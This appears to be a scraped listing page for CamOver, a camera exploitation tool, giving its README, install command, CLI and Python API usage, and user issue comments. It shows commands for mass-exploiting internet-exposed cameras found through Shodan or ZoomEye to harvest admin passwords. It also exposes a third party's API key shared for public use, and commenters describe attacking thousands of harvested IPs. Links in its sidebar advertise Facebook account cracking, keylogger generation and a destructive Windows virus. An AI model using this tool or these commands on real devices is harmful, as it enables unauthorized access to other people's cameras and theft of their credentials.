CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

Last update: Jan 02, 2023

Overview

CamOver

CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

Features

Exploits vulnerabilities in most popular camera models such as CCTV, GoAhead and Netwave.
Optimized to exploit multiple cameras at one time from list with threading enabled.
Simple CLI and API usage.

Installation

pip3 install git+https://github.com/EntySec/CamOver

Basic usage

To use CamOver just type camover in your terminal.

usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
               [--zoomeye ZOOMEYE] [-p PAGES]

CamOver is a camera exploitation tool that allows to disclosure network camera
admin password.

optional arguments:
  -h, --help            show this help message and exit
  -t, --threads         Use threads for fastest work.
  -o OUTPUT, --output OUTPUT
                        Output result to file.
  -i INPUT, --input INPUT
                        Input file of addresses.
  -a ADDRESS, --address ADDRESS
                        Single address.
  --shodan SHODAN       Shodan API key for exploiting devices over Internet.
  --zoomeye ZOOMEYE     ZoomEye API key for exploiting devices over Internet.
  -p PAGES, --pages PAGES
                        Number of pages you want to get from ZoomEye.

Examples

Exploiting single camera

Let's hack my camera just for fun.

camover -a 192.168.99.100

Exploiting cameras from Internet

Let's try to use Shodan search engine to exploit cameras over Internet, we will use it with -t for fast exploitation.

camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

NOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) is my PRO API key, you can use this key or your own, be free to use all our resources for free :)

Exploiting cameras from input file

Let's try to use opened database of cameras with -t for fast exploitation.

camover -t -i cameras.txt -o passwords.txt

NOTE: It will exploit all cameras in cameras.txt list by their addresses and save all obtained passwords to passwords.txt.

API usage

CamOver also has their own Python API that can be invoked by importing CamOver to your code.

from camover import CamOver

Basic functions

There are all CamOver basic functions that can be used to exploit specified camera.

exploit(address) - Exploit single camera by given address.

Examples

Exploiting single camera

from camover import CamOver

camover = CamOver()
creds = camover.exploit('192.168.99.100')

print(creds)

Other tools

Comments

why creds was none?

Holle! Excuse me.

Python 3.10.4 (main, Mar 25 2022, 15:08:58) [Clang 12.0.8 (https://android.googlesource.com/toolchain/llvm-project c935d99d7 on linux Type "help", "copyright", "credits" or "license" for more information.

from camover import CamOver camover = CamOver() creds = camover.exploit('192.168.99.100') print(creds) (None, None) creds = camover.exploit('192.168.10.2') print(creds) (None, None)

#"192.168.10.2"was my camera address,it was online. why creds was none? thanks, please.

opened by wr0x00 4
No output

Not sure what is going on but I got a list of cams and put them inside a txt and ran a command with and without threads and I'm not getting any output file even if I change the outputs name and refresh it doesn't seem to be making the list for some reason. Earlier I ran it for the first time and it got an output with only 1 ip but now i can't even get any output

camover -t -i test.txt --output newlist.txt

I run this and I get nothing outputted.

opened by SinThroughCode 2
Confused

I ran my own list of IPs and it returned a result of zero passwords for any of them and so I started trying to use the single brute method on around 30 of them and all said not vulnerable. So i tested it with expcamera and each IP I entered in that list was bruted with zero problem. I'm unsure of what would cause this and I know for a fact this list of 2k ips which is fresh from zoomeye are all mostly vulnerable considering I'm screening the same list on expcam right now and its still getting the passwords fine.

opened by SinThroughCode 1
Directory: : does not exist!

Why does it prompt that the directory does not exist when I execute the following command? Where to put password.txt in which directory

:~$ camover --shodan (My API_KEY) -o password.txt [-] Directory: : does not exist!

opened by ChhR00 1
When I install the program, I encounter this problem, how can I solve it?

[email protected]:~# pip3 install git+https://github.com/EntySec/CamOver.git Collecting git+https://github.com/EntySec/CamOver.git Cloning https://github.com/EntySec/CamOver.git to /tmp/pip-req-build-zchrgnp4 Running command git clone -q https://github.com/EntySec/CamOver.git /tmp/pip-req-build-zchrgnp4 fatal: unable to access 'https://github.com/EntySec/CamOver.git/': Could not resolve host: github.com ERROR: Command errored out with exit status 128: git clone -q https://github.com/EntySec/CamOver.git /tmp/pip-req-build-zchrgnp4 Check the logs for full command output.

opened by ChhR00 1
Search Shodan by Country/City

Hello!

Is there any way to search in Shodan by country and/or city?

In the past, when Entynet Project was alive, I remember editing the source of Entropy to modify the Shodan.query but I can't find a way.

Any help is welcomed.

Thanks!

opened by pispuso 1
Failed to Authorize Shodan

Hi,

When I type this command camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD I get an error [*] Authorizing Shodan by given API key... [-] Failed to authorize Shodan!

Any ideas ?

opened by ghost 1

Releases(1.0.0)

Owner

EntySec

EntySec is a group of security professionals and software engineers involved in the development of security tools and services.

GitHub Repository http://entysec.netlify.app

zip-brute Zip File Password Cracking with Using Password List

Zip brute is a python script that cracks zip that are password protected using a wordlist dictionary.

13 Nov 03, 2022

Shell hunter for AF

AF-ShellHunter AF-ShellHunter: Auto shell lookup AF-ShellHunter its a script designed to automate the search of WebShell's in AF Team How to pip3 ins

34 May 13, 2022

This is a multi-password‌ cracking tool that can help you hack facebook accounts very quickly

Pro_Crack Facebook Fast Cracking Tool This is a multi-password‌ cracking tool that can help you hack facebook accounts very quickly Installation On Te

1 Jan 16, 2022

NExfil is an OSINT tool written in python for finding profiles by username.

NExfil is an OSINT tool written in python for finding profiles by username. The provided usernames are checked on over 350 websites within few seconds.

1.4k Jan 01, 2023

Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3

Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3, It Fuzzes All URLs of target website & then scan them for EAR

9 Dec 12, 2022

A proxy server application written in python for trial purposes

python-proxy-server This is a proxy server ❤️ application written in python ❤️ for trial purposes. The purpose of the application; Connecting to Hacke

2 Dec 27, 2021

Searches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances of log4j library, including embedded (jar/war/zip) packaged ones.

33 Jan 04, 2023

Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports.

DOME - A subdomain enumeration tool Check the Spanish Version Dome is a fast and reliable python script that makes active and/or passive scan to obtai

329 Jan 01, 2023

CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

Related tags

Overview

CamOver

Features

Installation

Basic usage

Examples

API usage

Basic functions

Examples

Other tools

Comments

why creds was none?

No output

Confused

Directory: : does not exist!

When I install the program, I encounter this problem, how can I solve it?

Search Shodan by Country/City

Failed to Authorize Shodan

Releases(1.0.0)

Owner

EntySec

zip-brute Zip File Password Cracking with Using Password List

Shell hunter for AF

This is a multi-password‌ cracking tool that can help you hack facebook accounts very quickly

NExfil is an OSINT tool written in python for finding profiles by username.

Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3

A proxy server application written in python for trial purposes

Searches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances of log4j library, including embedded (jar/war/zip) packaged ones.

A secure password generator written in python

XSS scanner in python

OpenTOTP is yet another time-based, one-time passwords (OTPs) generator/verifier inspired by RFC 6238.

Windows Virus who destroy some impotants files on C:\windows\system32\

FBGen is simple facebook user based wordlist generator using Username/ID and cookie.

Password List Creator Simple !

This repository is one of a few malware collections on the GitHub.

Domain abuse scanner covering domainsquatting and phishing keywords.

PoC for CVE-2021-26855 -Just a checker-

MS-FSRVP coercion abuse PoC

⛤Keylogger Generator for Windows written in Python⛤

Scarecrow is a tool written in Python3 allowing you to protect your Python3 scripts.

Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports.